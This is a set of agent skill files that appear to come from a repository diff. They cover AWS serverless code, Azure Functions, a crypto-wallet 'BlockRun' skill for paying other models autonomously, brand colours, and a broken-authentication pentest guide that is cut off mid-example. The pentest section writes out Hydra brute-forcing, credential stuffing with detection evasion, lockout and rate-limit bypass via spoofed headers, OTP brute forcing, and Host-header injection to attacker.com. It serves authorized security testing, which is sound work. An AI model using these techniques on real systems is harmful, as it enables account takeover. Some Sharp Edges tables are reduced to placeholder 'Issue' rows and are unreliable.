description: "Specialized skill for building production-ready serverless applications on AWS. Covers Lambda functions, API Gateway, DynamoDB, SQS/SNS event-driven patterns, SAM/CDK deployment, and cold start optimization."
source: vibeship-spawner-skills (Apache 2.0)
---

# AWS Serverless
## Patterns

### Lambda Handler Pattern

Proper Lambda function structure with error handling

**When to use**: any Lambda function implementation (API handlers, event processors, scheduled tasks)

```javascript
// Node.js Lambda Handler
// handler.js

// Initialize outside handler (reused across invocations)
const { DynamoDBClient } = require('@aws-sdk/client-dynamodb');
const { DynamoDBDocumentClient, GetCommand } = require('@aws-sdk/lib-dynamodb');

const client = new DynamoDBClient({});
const docClient = DynamoDBDocumentClient.from(client);

// Handler function
exports.handler = async (event, context) => {
  // Optional: Don't wait for event loop to clear (Node.js)
  context.callbackWaitsForEmptyEventLoop = false;

  try {
    // Parse input based on event source
    const body = typeof event.body === 'string'
      ? JSON.parse(event.body)
      : event.body;

    // Business logic
    const result = await processRequest(body);

    // Return API Gateway compatible response
    return {
      statusCode: 200,
      headers: {
        'Content-Type': 'application/json',
        'Access-Control-Allow-Origin': '*'
      },
      body: JSON.stringify(result)
    };
  } catch (error) {
    console.error('Error:', JSON.stringify({
      error: error.message,
      stack: error.stack,
      requestId: context.awsRequestId
    }));

    return {
      statusCode: error.statusCode || 500,
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify({
        error: error.message || 'Internal server error'
      })
    };
  }
};

async function processRequest(data) {
  // Your business logic here
  const result = await docClient.send(new GetCommand({
    TableName: process.env.TABLE_NAME,
    Key: { id: data.id }
  }));
  return result.Item;
}
```

```python
# Python Lambda Handler
# handler.py

import json
import os
import logging
import boto3
from botocore.exceptions import ClientError

# Initialize outside handler (reused across invocations)
logger = logging.getLogger()
logger.setLevel(logging.INFO)

dynamodb = boto3.resource('dynamodb')
table = dynamodb.Table(os.environ['TABLE_NAME'])

def handler(event, context):
    try:
        # Parse input based on event source (the body of this handler was
        # truncated in the source; completed here to mirror the Node.js version)
        body = json.loads(event['body']) if isinstance(event.get('body'), str) else event.get('body')

        item = table.get_item(Key={'id': body['id']}).get('Item')

        return {
            'statusCode': 200,
            'headers': {'Content-Type': 'application/json'},
            'body': json.dumps(item)
        }
    except ClientError as e:
        logger.error(json.dumps({
            'error': str(e),
            'requestId': context.aws_request_id
        }))
        return {
            'statusCode': 500,
            'headers': {'Content-Type': 'application/json'},
            'body': json.dumps({'error': 'Internal server error'})
        }
```
### API Gateway Integration Pattern

REST API and HTTP API integration with Lambda

**When to use**: building REST APIs backed by Lambda; you need HTTP endpoints for functions

```yaml
# template.yaml (SAM)
AWSTemplateFormatVersion: '2010-09-09'
Transform: AWS::Serverless-2016-10-31

Globals:
  Function:
    Runtime: nodejs20.x
    Timeout: 30
    MemorySize: 256
    Environment:
      Variables:
        TABLE_NAME: !Ref ItemsTable

Resources:
  # HTTP API (recommended for simple use cases)
  HttpApi:
    Type: AWS::Serverless::HttpApi
    Properties:
      StageName: prod
      CorsConfiguration:
        AllowOrigins:
          - "*"
        AllowMethods:
          - GET
          - POST
          - DELETE
        AllowHeaders:
          - "*"

  # Lambda Functions
  GetItemFunction:
    Type: AWS::Serverless::Function
    Properties:
      Handler: src/handlers/get.handler
      Events:
        GetItem:
          Type: HttpApi
          Properties:
            ApiId: !Ref HttpApi
            Path: /items/{id}
            Method: GET
      Policies:
        - DynamoDBReadPolicy:
            TableName: !Ref ItemsTable

  CreateItemFunction:
    Type: AWS::Serverless::Function
    Properties:
      Handler: src/handlers/create.handler
      Events:
        CreateItem:
          Type: HttpApi
          Properties:
            ApiId: !Ref HttpApi
            Path: /items
            Method: POST
      Policies:
        - DynamoDBCrudPolicy:
            TableName: !Ref ItemsTable

  # DynamoDB Table
  ItemsTable:
    Type: AWS::DynamoDB::Table
    Properties:
      AttributeDefinitions:
        - AttributeName: id
          AttributeType: S
      KeySchema:
        - AttributeName: id
          KeyType: HASH
      BillingMode: PAY_PER_REQUEST

Outputs:
  ApiUrl:
    Value: !Sub "https://${HttpApi}.execute-api.${AWS::Region}.amazonaws.com/prod"
```

```javascript
// src/handlers/get.js
const { getItem } = require('../lib/dynamodb');

exports.handler = async (event) => {
  const id = event.pathParameters?.id;

  if (!id) {
    return {
      statusCode: 400,
      body: JSON.stringify({ error: 'Missing id parameter' })
    };
  }

  // The source was truncated here; a plausible completion:
  const item = await getItem(id);

  if (!item) {
    return {
      statusCode: 404,
      body: JSON.stringify({ error: 'Item not found' })
    };
  }

  return {
    statusCode: 200,
    body: JSON.stringify(item)
  };
};
```
### Event-Driven SQS Pattern

Lambda triggered by SQS for reliable async processing

**When to use**: decoupled, asynchronous processing; need retry logic and a DLQ; processing messages in batches

```yaml
# template.yaml
Resources:
  ProcessorFunction:
    Type: AWS::Serverless::Function
    Properties:
      Handler: src/handlers/processor.handler
      Events:
        SQSEvent:
          Type: SQS
          Properties:
            Queue: !GetAtt ProcessingQueue.Arn
            BatchSize: 10
            FunctionResponseTypes:
              - ReportBatchItemFailures # Partial batch failure handling

  ProcessingQueue:
    Type: AWS::SQS::Queue
    Properties:
      VisibilityTimeout: 180 # 6x Lambda timeout
      RedrivePolicy:
        deadLetterTargetArn: !GetAtt DeadLetterQueue.Arn
        maxReceiveCount: 3

  DeadLetterQueue:
    Type: AWS::SQS::Queue
    Properties:
      MessageRetentionPeriod: 1209600 # 14 days
```

```javascript
// src/handlers/processor.js
exports.handler = async (event) => {
  const batchItemFailures = [];

  for (const record of event.Records) {
    try {
      const body = JSON.parse(record.body);
      await processMessage(body);
    } catch (error) {
      console.error(`Failed to process message ${record.messageId}:`, error);
      // Report this item as failed (will be retried)
      batchItemFailures.push({
        itemIdentifier: record.messageId
      });
    }
  }

  // Return failed items for retry
  return { batchItemFailures };
};

async function processMessage(message) {
  // Your processing logic
  console.log('Processing:', message);

  // Simulate work
  await saveToDatabase(message);
}
```

```python
# Python version
import json
import logging

logger = logging.getLogger()

def handler(event, context):
    batch_item_failures = []

    for record in event['Records']:
        try:
            body = json.loads(record['body'])
            process_message(body)
        except Exception as e:
            logger.error(f"Failed to process {record['messageId']}: {e}")
            batch_item_failures.append({
                'itemIdentifier': record['messageId']
            })

    return {'batchItemFailures': batch_item_failures}

def process_message(message):
    # Your processing logic (mirrors the Node.js processMessage above)
    logger.info('Processing: %s', message)
```
## Anti-Patterns

### ❌ Monolithic Lambda

**Why bad**: Large deployment packages cause slow cold starts.
Hard to scale individual operations.
Updates affect the entire system.

### ❌ Large Dependencies

**Why bad**: Increases deployment package size.
Slows down cold starts significantly.
Most of the SDK/library may be unused.

### ❌ Synchronous Calls in VPC

**Why bad**: VPC-attached Lambdas have ENI setup overhead.
Blocking DNS lookups or connections worsen cold starts.

## ⚠️ Sharp Edges

| Issue | Severity | Solution |
|-------|----------|----------|
| Issue | high | Measure your INIT phase |
| Issue | high | Set appropriate timeout |
| Issue | high | Increase memory allocation |
| Issue | medium | Verify VPC configuration |
| Issue | medium | Tell Lambda not to wait for event loop |
| Issue | medium | For large file uploads |
| Issue | high | Use different buckets/prefixes |
---

**File: `skills/azure-functions/SKILL.md`** (new file, 42 lines)
---
name: azure-functions
description: "Expert patterns for Azure Functions development including isolated worker model, Durable Functions orchestration, cold start optimization, and production patterns. Covers .NET, Python, and Node.js programming models. Use when: azure function, azure functions, durable functions, azure serverless, function app."
source: vibeship-spawner-skills (Apache 2.0)
---

# Azure Functions

## Patterns

### Isolated Worker Model (.NET)

Modern .NET execution model with process isolation

### Node.js v4 Programming Model

Modern code-centric approach for TypeScript/JavaScript

### Python v2 Programming Model

Decorator-based approach for Python functions

## Anti-Patterns

### ❌ Blocking Async Calls

### ❌ New HttpClient Per Request

### ❌ In-Process Model for New Projects

## ⚠️ Sharp Edges

| Issue | Severity | Solution |
|-------|----------|----------|
| Issue | high | Use async pattern with Durable Functions |
| Issue | high | Use IHttpClientFactory (recommended) |
| Issue | high | Always use async/await |
| Issue | medium | Configure maximum timeout (Consumption) |
| Issue | high | Use isolated worker for new projects |
| Issue | medium | Configure Application Insights properly |
| Issue | medium | Check extension bundle (most common) |
| Issue | medium | Add warmup trigger to initialize your code |
292
skills/blockrun/SKILL.md
Normal file
@@ -0,0 +1,292 @@
---
name: blockrun
description: Use when user needs capabilities Claude lacks (image generation, real-time X/Twitter data) or explicitly requests external models ("blockrun", "use grok", "use gpt", "dall-e", "deepseek")
allowed-tools: Read, Bash(python:*), Bash(python3:*), Bash(pip:*), Bash(source:*)
---

# BlockRun

**BlockRun works with Claude Code and Google Antigravity.**

You can't generate images. You have no real-time X/Twitter access. BlockRun gives you these capabilities.

## Philosophy

You have a wallet. When you need a capability you lack, you pay for it autonomously.

| You Need | You Call | Pricing |
|----------|----------|---------|
| Image generation | DALL-E | $0.04/image |
| Real-time X data | Grok + Live Search | $0.025/source |
| Second opinion | GPT-5.2 | $1.75/M input, $14/M output |
| Cheaper processing | DeepSeek | $0.14/M input, $0.28/M output |

**How it works:** BlockRun uses x402 micropayments to route your requests to OpenAI, xAI, Google, and other providers. No API keys needed - your wallet pays per token.

## Budget Control (Optional)

If the user specifies a budget (e.g., "use at most $1"), track spending and stop when the budget is reached:

```python
from blockrun_llm import setup_agent_wallet

client = setup_agent_wallet()
budget = 1.0  # User's budget

# Before each call, check if within budget
spending = client.get_spending()
if spending['total_usd'] >= budget:
    print(f"Budget reached: ${spending['total_usd']:.4f} spent")
    # Stop making calls
else:
    response = client.chat("openai/gpt-5.2", "Hello!")

# At the end, report spending
spending = client.get_spending()
print(f"💰 Total spent: ${spending['total_usd']:.4f} across {spending['calls']} calls")
```

## When to Use

| Trigger | Your Action |
|---------|-------------|
| User explicitly requests ("blockrun second opinion with GPT on...", "use grok to check...", "generate image with dall-e") | Execute via BlockRun |
| User needs something you can't do (images, live X data) | Suggest BlockRun, wait for confirmation |
| You can handle the task fine | Do it yourself, don't mention BlockRun |

## Example User Prompts

Users will say things like:

| User Says | What You Do |
|-----------|-------------|
| "blockrun generate an image of a sunset" | Call DALL-E via ImageClient |
| "use grok to check what's trending on X" | Call Grok with `search=True` |
| "blockrun GPT review this code" | Call GPT-5.2 via LLMClient |
| "what's the latest news about AI agents?" | Suggest Grok (you lack real-time data) |
| "generate a logo for my startup" | Suggest DALL-E (you can't generate images) |
| "blockrun check my balance" | Show wallet balance via `get_balance()` |
| "blockrun deepseek summarize this file" | Call DeepSeek for cost savings |

## Wallet & Balance

Use `setup_agent_wallet()` to auto-create a wallet and get a client. This shows the QR code and welcome message on first use.

**Initialize client (always start with this):**

```python
from blockrun_llm import setup_agent_wallet

client = setup_agent_wallet()  # Auto-creates wallet, shows QR if new
```

**Check balance (when user asks "show balance", "check wallet", etc.):**

```python
balance = client.get_balance()  # On-chain USDC balance
print(f"Balance: ${balance:.2f} USDC")
print(f"Wallet: {client.get_wallet_address()}")
```

**Show QR code for funding:**

```python
from blockrun_llm import generate_wallet_qr_ascii, get_wallet_address

# ASCII QR for terminal display
print(generate_wallet_qr_ascii(get_wallet_address()))
```

## SDK Usage

**Prerequisite:** Install the SDK with `pip install blockrun-llm`

### Basic Chat

```python
from blockrun_llm import setup_agent_wallet

client = setup_agent_wallet()  # Auto-creates wallet if needed
response = client.chat("openai/gpt-5.2", "What is 2+2?")
print(response)

# Check spending
spending = client.get_spending()
print(f"Spent ${spending['total_usd']:.4f}")
```

### Real-time X/Twitter Search (xAI Live Search)

**IMPORTANT:** For real-time X/Twitter data, you MUST enable Live Search with `search=True` or `search_parameters`.

```python
from blockrun_llm import setup_agent_wallet

client = setup_agent_wallet()

# Simple: Enable live search with search=True
response = client.chat(
    "xai/grok-3",
    "What are the latest posts from @blockrunai on X?",
    search=True  # Enables real-time X/Twitter search
)
print(response)
```

### Advanced X Search with Filters

```python
from blockrun_llm import setup_agent_wallet

client = setup_agent_wallet()

response = client.chat(
    "xai/grok-3",
    "Analyze @blockrunai's recent content and engagement",
    search_parameters={
        "mode": "on",
        "sources": [
            {
                "type": "x",
                "included_x_handles": ["blockrunai"],
                "post_favorite_count": 5
            }
        ],
        "max_search_results": 20,
        "return_citations": True
    }
)
print(response)
```

### Image Generation

```python
from blockrun_llm import ImageClient

client = ImageClient()
result = client.generate("A cute cat wearing a space helmet")
print(result.data[0].url)
```

## xAI Live Search Reference

Live Search is xAI's real-time data API. Cost: **$0.025 per source** (default 10 sources = ~$0.25).

To reduce costs, set `max_search_results` to a lower value:

```python
# Only use 5 sources (~$0.13)
response = client.chat("xai/grok-3", "What's trending?",
    search_parameters={"mode": "on", "max_search_results": 5})
```

### Search Parameters

| Parameter | Type | Default | Description |
|-----------|------|---------|-------------|
| `mode` | string | "auto" | "off", "auto", or "on" |
| `sources` | array | web,news,x | Data sources to query |
| `return_citations` | bool | true | Include source URLs |
| `from_date` | string | - | Start date (YYYY-MM-DD) |
| `to_date` | string | - | End date (YYYY-MM-DD) |
| `max_search_results` | int | 10 | Max sources to return (customize to control cost) |

### Source Types

**X/Twitter Source:**

```python
{
    "type": "x",
    "included_x_handles": ["handle1", "handle2"],  # Max 10
    "excluded_x_handles": ["spam_account"],  # Max 10
    "post_favorite_count": 100,  # Min likes threshold
    "post_view_count": 1000  # Min views threshold
}
```

**Web Source:**

```python
{
    "type": "web",
    "country": "US",  # ISO alpha-2 code
    "allowed_websites": ["example.com"],  # Max 5
    "safe_search": True
}
```

**News Source:**

```python
{
    "type": "news",
    "country": "US",
    "excluded_websites": ["tabloid.com"]  # Max 5
}
```

## Available Models

| Model | Best For | Pricing |
|-------|----------|---------|
| `openai/gpt-5.2` | Second opinions, code review, general | $1.75/M in, $14/M out |
| `openai/gpt-5-mini` | Cost-optimized reasoning | $0.30/M in, $1.20/M out |
| `openai/o4-mini` | Latest efficient reasoning | $1.10/M in, $4.40/M out |
| `openai/o3` | Advanced reasoning, complex problems | $10/M in, $40/M out |
| `xai/grok-3` | Real-time X/Twitter data | $3/M + $0.025/source |
| `deepseek/deepseek-chat` | Simple tasks, bulk processing | $0.14/M in, $0.28/M out |
| `google/gemini-2.5-flash` | Very long documents, fast | $0.15/M in, $0.60/M out |
| `openai/dall-e-3` | Photorealistic images | $0.04/image |
| `google/nano-banana` | Fast, artistic images | $0.01/image |

*M = million tokens. Actual cost depends on your prompt and response length.*

## Cost Reference

All LLM costs are per million tokens (M = 1,000,000 tokens).

| Model | Input | Output |
|-------|-------|--------|
| GPT-5.2 | $1.75/M | $14.00/M |
| GPT-5-mini | $0.30/M | $1.20/M |
| Grok-3 (no search) | $3.00/M | $15.00/M |
| DeepSeek | $0.14/M | $0.28/M |

| Fixed Cost Actions | Cost |
|-------|--------|
| Grok Live Search | $0.025/source (default 10 = $0.25) |
| DALL-E image | $0.04/image |
| Nano Banana image | $0.01/image |

**Typical costs:** A 500-word prompt (~750 tokens) to GPT-5.2 costs ~$0.001 input. A 1000-word response (~1500 tokens) costs ~$0.02 output.
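
The arithmetic above can be sketched as a small helper. The prices mirror the tables in this document; the words-to-tokens ratio (~1.5) is a rough rule of thumb, not a real tokenizer.

```python
# Rough per-call cost estimator (M = 1,000,000 tokens).
# Prices copied from the Cost Reference table above.
PRICES = {  # model: (input $/M, output $/M)
    "openai/gpt-5.2": (1.75, 14.00),
    "deepseek/deepseek-chat": (0.14, 0.28),
}

def estimate_cost(model: str, input_tokens: int, output_tokens: int) -> float:
    """Estimated USD cost of one chat call at per-million-token pricing."""
    in_price, out_price = PRICES[model]
    return (input_tokens * in_price + output_tokens * out_price) / 1_000_000

# ~750-token prompt plus ~1500-token response to GPT-5.2
print(f"${estimate_cost('openai/gpt-5.2', 750, 1500):.4f}")  # → $0.0223
```

The same call routed to DeepSeek costs roughly 60x less, which is why the table above recommends it for bulk processing.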

## Setup & Funding

**Wallet location:** `$HOME/.blockrun/.session` (e.g., `/Users/username/.blockrun/.session`)

**First-time setup:**

1. Wallet auto-creates when `setup_agent_wallet()` is called
2. Check wallet and balance:

   ```python
   from blockrun_llm import setup_agent_wallet

   client = setup_agent_wallet()
   print(f"Wallet: {client.get_wallet_address()}")
   print(f"Balance: ${client.get_balance():.2f} USDC")
   ```

3. Fund wallet with $1-5 USDC on Base network

**Show QR code for funding (ASCII for terminal):**

```python
from blockrun_llm import generate_wallet_qr_ascii, get_wallet_address

print(generate_wallet_qr_ascii(get_wallet_address()))
```

## Troubleshooting

**"Grok says it has no real-time access"**
→ You forgot to enable Live Search. Add `search=True`:

```python
response = client.chat("xai/grok-3", "What's trending?", search=True)
```

**Module not found**
→ Install the SDK: `pip install blockrun-llm`

## Updates

```bash
pip install --upgrade blockrun-llm
```
73
skills/brand-guidelines-community/SKILL.md
Normal file
@@ -0,0 +1,73 @@
---
name: brand-guidelines
description: Applies Anthropic's official brand colors and typography to any sort of artifact that may benefit from having Anthropic's look-and-feel. Use it when brand colors or style guidelines, visual formatting, or company design standards apply.
license: Complete terms in LICENSE.txt
---

# Anthropic Brand Styling

## Overview

To access Anthropic's official brand identity and style resources, use this skill.

**Keywords**: branding, corporate identity, visual identity, post-processing, styling, brand colors, typography, Anthropic brand, visual formatting, visual design

## Brand Guidelines

### Colors

**Main Colors:**

- Dark: `#141413` - Primary text and dark backgrounds
- Light: `#faf9f5` - Light backgrounds and text on dark
- Mid Gray: `#b0aea5` - Secondary elements
- Light Gray: `#e8e6dc` - Subtle backgrounds

**Accent Colors:**

- Orange: `#d97757` - Primary accent
- Blue: `#6a9bcc` - Secondary accent
- Green: `#788c5d` - Tertiary accent

### Typography

- **Headings**: Poppins (with Arial fallback)
- **Body Text**: Lora (with Georgia fallback)
- **Note**: Fonts should be pre-installed in your environment for best results

## Features

### Smart Font Application

- Applies Poppins font to headings (24pt and larger)
- Applies Lora font to body text
- Automatically falls back to Arial/Georgia if custom fonts unavailable
- Preserves readability across all systems

### Text Styling

- Headings (24pt+): Poppins font
- Body text: Lora font
- Smart color selection based on background
- Preserves text hierarchy and formatting

### Shape and Accent Colors

- Non-text shapes use accent colors
- Cycles through orange, blue, and green accents
- Maintains visual interest while staying on-brand

## Technical Details

### Font Management

- Uses system-installed Poppins and Lora fonts when available
- Provides automatic fallback to Arial (headings) and Georgia (body)
- No font installation required - works with existing system fonts
- For best results, pre-install Poppins and Lora fonts in your environment

### Color Application

- Uses RGB color values for precise brand matching
- Applied via python-pptx's RGBColor class
- Maintains color fidelity across different systems
473
skills/broken-authentication/SKILL.md
Normal file
@@ -0,0 +1,473 @@
---
name: Broken Authentication Testing
description: This skill should be used when the user asks to "test for broken authentication vulnerabilities", "assess session management security", "perform credential stuffing tests", "evaluate password policies", "test for session fixation", or "identify authentication bypass flaws". It provides comprehensive techniques for identifying authentication and session management weaknesses in web applications.
---

# Broken Authentication Testing

## Purpose

Identify and exploit authentication and session management vulnerabilities in web applications. Broken authentication consistently ranks in the OWASP Top 10 and can lead to account takeover, identity theft, and unauthorized access to sensitive systems. This skill covers testing methodologies for password policies, session handling, multi-factor authentication, and credential management.

## Prerequisites

### Required Knowledge

- HTTP protocol and session mechanisms
- Authentication types (SFA, 2FA, MFA)
- Cookie and token handling
- Common authentication frameworks

### Required Tools

- Burp Suite Professional or Community
- Hydra or similar brute-force tools
- Custom wordlists for credential testing
- Browser developer tools

### Required Access

- Target application URL
- Test account credentials
- Written authorization for testing

## Outputs and Deliverables

1. **Authentication Assessment Report** - Document all identified vulnerabilities
2. **Credential Testing Results** - Brute-force and dictionary attack outcomes
3. **Session Security Analysis** - Token randomness and timeout evaluation
4. **Remediation Recommendations** - Security hardening guidance

## Core Workflow

### Phase 1: Authentication Mechanism Analysis

Understand the application's authentication architecture:

```
# Identify authentication type
- Password-based (forms, basic auth, digest)
- Token-based (JWT, OAuth, API keys)
- Certificate-based (mutual TLS)
- Multi-factor (SMS, TOTP, hardware tokens)

# Map authentication endpoints
/login, /signin, /authenticate
/register, /signup
/forgot-password, /reset-password
/logout, /signout
/api/auth/*, /oauth/*
```

Capture and analyze authentication requests:

```http
POST /login HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

username=test&password=test123
```

### Phase 2: Password Policy Testing

Evaluate password requirements and enforcement:

```bash
# Test minimum length (a, ab, abcdefgh)
# Test complexity (password, password1, Password1!)
# Test common weak passwords (123456, password, qwerty, admin)
# Test username as password (admin/admin, test/test)
```

Document policy gaps: Minimum length <8, no complexity, common passwords allowed, username as password.
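
The gaps listed above can be checked mechanically. A minimal sketch — the rule names and the tiny common-password set are illustrative, not from any standard:

```python
import re

# Illustrative sample; in practice load a breached-password list (e.g. SecLists)
COMMON_PASSWORDS = {"123456", "password", "qwerty", "admin"}

def policy_gaps(password: str, username: str) -> list:
    """Return the policy rules a candidate password violates."""
    gaps = []
    if len(password) < 8:
        gaps.append("min-length")
    if not (re.search(r"[a-z]", password) and re.search(r"[A-Z]", password)
            and re.search(r"\d", password)):
        gaps.append("complexity")
    if password.lower() in COMMON_PASSWORDS:
        gaps.append("common-password")
    if password.lower() == username.lower():
        gaps.append("username-as-password")
    return gaps

print(policy_gaps("admin", "admin"))
```

Running each test password from the block above through a checker like this gives a reproducible record of which policy rules the target failed to enforce.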

### Phase 3: Credential Enumeration

Test for username enumeration vulnerabilities:

```bash
# Compare responses for valid vs invalid usernames
# Invalid: "Invalid username" vs Valid: "Invalid password"
# Check timing differences, response codes, registration messages

# Password reset
"Email sent if account exists" (secure)
"No account with that email" (leaks info)

# API responses
{"error": "user_not_found"}
{"error": "invalid_password"}
```

### Phase 4: Brute Force Testing

Test account lockout and rate limiting:

```bash
# Using Hydra for form-based auth
hydra -l admin -P /usr/share/wordlists/rockyou.txt \
  target.com http-post-form \
  "/login:username=^USER^&password=^PASS^:Invalid credentials"

# Using Burp Intruder
1. Capture login request
2. Send to Intruder
3. Set payload positions on password field
4. Load wordlist
5. Start attack
6. Analyze response lengths/codes
```

Check for protections:

```bash
# Account lockout
- After how many attempts?
- Duration of lockout?
- Lockout notification?

# Rate limiting
- Requests per minute limit?
- IP-based or account-based?
- Bypass via headers (X-Forwarded-For)?

# CAPTCHA
- After failed attempts?
- Easily bypassable?
```

### Phase 5: Credential Stuffing

Test with known breached credentials:

```bash
# Credential stuffing differs from brute force
# Uses known email:password pairs from breaches

# Using Burp Intruder with Pitchfork attack
1. Set username and password as positions
2. Load email list as payload 1
3. Load password list as payload 2 (matched pairs)
4. Analyze for successful logins

# Detection evasion
- Slow request rate
- Rotate source IPs
- Randomize user agents
- Add delays between attempts
```
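
The pitchfork pairing above boils down to walking two lists in lockstep rather than taking their cross product. A minimal sketch — the sample credentials are made up:

```python
import itertools

emails = ["alice@example.com", "bob@example.com"]
passwords = ["hunter2", "letmein"]

# Pitchfork / credential stuffing: replay matched email:password pairs
stuffing_attempts = list(zip(emails, passwords))

# Brute force, by contrast, tries the full cross product
brute_attempts = list(itertools.product(emails, passwords))

print(len(stuffing_attempts))  # 2 attempts
print(len(brute_attempts))     # 4 attempts
```

This is why stuffing scales linearly with breach size while brute force scales with the product of both lists — and why stuffing is far harder to distinguish from legitimate logins.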

### Phase 6: Session Management Testing

Analyze session token security:

```bash
# Capture session cookie
Cookie: SESSIONID=abc123def456

# Test token characteristics
1. Entropy - Is it random enough?
2. Length - Sufficient length (128+ bits)?
3. Predictability - Sequential patterns?
4. Secure flags - HttpOnly, Secure, SameSite?
```

Session token analysis:

```python
#!/usr/bin/env python3
import requests

# Collect multiple session tokens
tokens = []
for i in range(100):
    response = requests.get("https://target.com/login")
    token = response.cookies.get("SESSIONID")
    tokens.append(token)

# Analyze for patterns
# Check for sequential increments
# Calculate entropy
# Look for timestamp components
```
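
The entropy step left as a comment in the script above can be sketched with the standard library. Per-character Shannon entropy is only a crude screen — it flags repetitive tokens but cannot prove randomness:

```python
import math
from collections import Counter

def shannon_entropy_bits(token: str) -> float:
    """Per-character Shannon entropy of a token, in bits per character."""
    counts = Counter(token)
    n = len(token)
    return sum((c / n) * math.log2(n / c) for c in counts.values())

print(shannon_entropy_bits("aaaaaaaa"))  # 0.0 — no variation at all
print(shannon_entropy_bits("a1b2c3d4"))  # 3.0 — 8 distinct characters
```

A healthy session ID drawn from a large alphabet should score close to the maximum for its character set; tokens scoring far below that deserve the sequential-pattern and timestamp checks listed above.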

### Phase 7: Session Fixation Testing

Test if session is regenerated after authentication:

```bash
# Step 1: Get session before login
GET /login HTTP/1.1
Response: Set-Cookie: SESSIONID=abc123

# Step 2: Login with same session
POST /login HTTP/1.1
Cookie: SESSIONID=abc123
username=valid&password=valid

# Step 3: Check if session changed
# VULNERABLE if SESSIONID remains abc123
# SECURE if new session assigned after login
```

Attack scenario:

```bash
# Attacker workflow:
1. Attacker visits site, gets session: SESSIONID=attacker_session
2. Attacker sends link to victim with fixed session:
   https://target.com/login?SESSIONID=attacker_session
3. Victim logs in with attacker's session
4. Attacker now has authenticated session
```

### Phase 8: Session Timeout Testing

Verify session expiration policies:

```bash
# Test idle timeout
1. Login and note session cookie
2. Wait without activity (15, 30, 60 minutes)
3. Attempt to use session
4. Check if session is still valid

# Test absolute timeout
1. Login and continuously use session
2. Check if forced logout after set period (8 hours, 24 hours)

# Test logout functionality
1. Login and note session
2. Click logout
3. Attempt to reuse old session cookie
4. Session should be invalidated server-side
```

### Phase 9: Multi-Factor Authentication Testing

Assess MFA implementation security:

```bash
# OTP brute force
- 4-digit OTP = 10,000 combinations
- 6-digit OTP = 1,000,000 combinations
- Test rate limiting on OTP endpoint

# OTP bypass techniques
- Skip MFA step by direct URL access
- Modify response to indicate MFA passed
- Null/empty OTP submission
- Previous valid OTP reuse

# API Version Downgrade Attack (crAPI example)
# If /api/v3/check-otp has rate limiting, try older versions:
POST /api/v2/check-otp
{"otp": "1234"}
# Older API versions may lack security controls

# Using Burp for OTP testing
1. Capture OTP verification request
2. Send to Intruder
3. Set OTP field as payload position
4. Use numbers payload (0000-9999)
5. Check for successful bypass
```
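
The keyspace figures above translate directly into a worst-case exhaustion time at a given request rate, which is the number that makes rate limiting (or its absence) meaningful. A quick sanity check — the 10 req/s rate is an arbitrary example:

```python
def otp_keyspace(digits: int) -> int:
    """Number of possible numeric OTPs of the given length."""
    return 10 ** digits

def exhaust_seconds(digits: int, requests_per_second: float) -> float:
    """Worst-case time to try every OTP at a fixed request rate."""
    return otp_keyspace(digits) / requests_per_second

print(otp_keyspace(4))         # 10000
print(otp_keyspace(6))         # 1000000
print(exhaust_seconds(4, 10))  # 1000.0 seconds (~17 minutes)
```

An unthrottled 4-digit OTP falls in minutes; even a 6-digit OTP falls in about a day at 10 req/s, which is why the endpoint must enforce attempt limits or token expiry, not just length.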

Test MFA enrollment:

```bash
# Forced enrollment
- Can MFA be skipped during setup?
- Can backup codes be accessed without verification?

# Recovery process
- Can MFA be disabled via email alone?
- Social engineering potential?
```

### Phase 10: Password Reset Testing

Analyze password reset security:

```bash
# Token security
1. Request password reset
2. Capture reset link
3. Analyze token:
   - Length and randomness
   - Expiration time
   - Single-use enforcement
   - Account binding

# Token manipulation
https://target.com/reset?token=abc123&user=victim
# Try changing user parameter while using valid token

# Host header injection
POST /forgot-password HTTP/1.1
Host: attacker.com
email=victim@email.com
# Reset email may contain attacker's domain
```

## Quick Reference

### Common Vulnerability Types

| Vulnerability | Risk | Test Method |
|--------------|------|-------------|
| Weak passwords | High | Policy testing, dictionary attack |
| No lockout | High | Brute force testing |
| Username enumeration | Medium | Differential response analysis |
| Session fixation | High | Pre/post-login session comparison |
| Weak session tokens | High | Entropy analysis |
| No session timeout | Medium | Long-duration session testing |
| Insecure password reset | High | Token analysis, workflow bypass |
| MFA bypass | Critical | Direct access, response manipulation |

### Credential Testing Payloads

```bash
# Default credentials
admin:admin
admin:password
admin:123456
root:root
test:test
user:user

# Common passwords
123456
password
12345678
qwerty
abc123
password1
admin123

# Breached credential databases
- Have I Been Pwned dataset
- SecLists passwords
- Custom targeted lists
```

### Session Cookie Flags

| Flag | Purpose | Vulnerability if Missing |
|------|---------|------------------------|
| HttpOnly | Prevent JS access | XSS can steal session |
| Secure | HTTPS only | Sent over HTTP |
| SameSite | CSRF protection | Cross-site requests allowed |
| Path | URL scope | Broader exposure |
| Domain | Domain scope | Subdomain access |
| Expires | Lifetime | Persistent sessions |

### Rate Limiting Bypass Headers

```http
X-Forwarded-For: 127.0.0.1
X-Real-IP: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
True-Client-IP: 127.0.0.1
```
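
When testing whether a rate limiter keys on one of these headers, it helps to rotate the spoofed address on every request. A sketch that only builds the header values — the subnet is arbitrary and the sending of requests is left to your tool of choice:

```python
import ipaddress

def xff_headers(cidr: str, limit: int):
    """Yield per-request header dicts rotating X-Forwarded-For through a subnet."""
    for i, host in enumerate(ipaddress.ip_network(cidr).hosts()):
        if i >= limit:
            return
        yield {"X-Forwarded-For": str(host)}

headers = list(xff_headers("192.168.1.0/24", 3))
print(headers[0])  # {'X-Forwarded-For': '192.168.1.1'}
```

If the attempt counter resets with each new spoofed address, the limiter trusts client-supplied headers and the protection is bypassable.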

## Constraints and Limitations

### Legal Requirements

- Only test with explicit written authorization
- Avoid testing with real breached credentials
- Do not access actual user accounts
- Document all testing activities

### Technical Limitations

- CAPTCHA may prevent automated testing
- Rate limiting affects brute force timing
- MFA significantly increases attack difficulty
- Some vulnerabilities require victim interaction

### Scope Considerations

- Test accounts may behave differently than production
- Some features may be disabled in test environments
- Third-party authentication may be out of scope
- Production testing requires extra caution

## Examples

### Example 1: Account Lockout Bypass

**Scenario:** Test if account lockout can be bypassed

```bash
# Step 1: Identify lockout threshold
# Try 5 wrong passwords for admin account
# Result: "Account locked for 30 minutes"

# Step 2: Test bypass via IP rotation
# Use X-Forwarded-For header
POST /login HTTP/1.1
X-Forwarded-For: 192.168.1.1
username=admin&password=attempt1

# Increment IP for each attempt
